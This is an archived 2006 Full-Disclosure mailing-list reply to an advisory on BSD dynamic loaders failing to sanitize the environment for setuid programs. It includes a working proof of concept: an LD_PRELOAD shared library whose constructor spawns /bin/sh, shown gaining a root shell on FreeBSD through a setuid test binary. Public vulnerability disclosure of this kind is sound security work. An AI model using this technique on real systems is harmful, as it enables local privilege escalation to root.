lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list] 
Message-ID: <985b1a3d0611221355g4bd9824cmc69c835c9822330e@mail.gmail.com>
Date: Wed, 22 Nov 2006 22:55:37 +0100
From: "Tyop?" <tyoptyop@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Re: Lack of environment sanitization in the
	FreeBSD, OpenBSD, NetBSD dynamic loaders.

On 11/22/06, In Cognito <defend.the.world@...il.com> wrote:
> Impact:  Serious. May lead to privilege escalation.
>
> A class of security vulnerabilities has resurfaced in the dynamic loaders
> of FreeBSD, OpenBSD, and NetBSD in the sanitization of environment
> variables for suid and sgid binaries.
>
> Due to either badly implemented sanitization or a lack of it, a setuid
> binary may execute other processes with a tainted environment.
>
> [...]
>
> Have fun! Stay safe!
>


Fun. Not "perfectly" safe.

My experience :

%id
uid=0(root) gid=0(wheel) groups=0(wheel), 5(operator)
%cat vuln.c
main()
{
  setuid(0);
  execl("/usr/bin/id","id",0);
}
%cc vuln.c -o vuln && chmod 4711 ./vuln
%exit

> id
uid=1001(tyop) gid=1001(tyop) groups=1001(tyop)
> ls -l vuln
-rws--x--x  1 root  tyop  4827 Nov 22 22:46 vuln
> cat tyop.c
__attribute__ ((constructor)) main()
{
  printf("[+] Hello from shared library land\n");
  execle("/bin/sh","sh",0,0);
}
> cc -shared -o lib.so tyop.c
> setenv LD_PRELOAD "/home/tyop/test/lib.so"
> ./vuln
[+] Hello from shared library land
# id
uid=0(root) gid=0(wheel) egid=1001(tyop) groups=1001(tyop)
# echo "It works on `uname -sr`"
It works on FreeBSD 7.0-CURRENT-200609
#

Have a nice day.

-- 
Tyop?

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ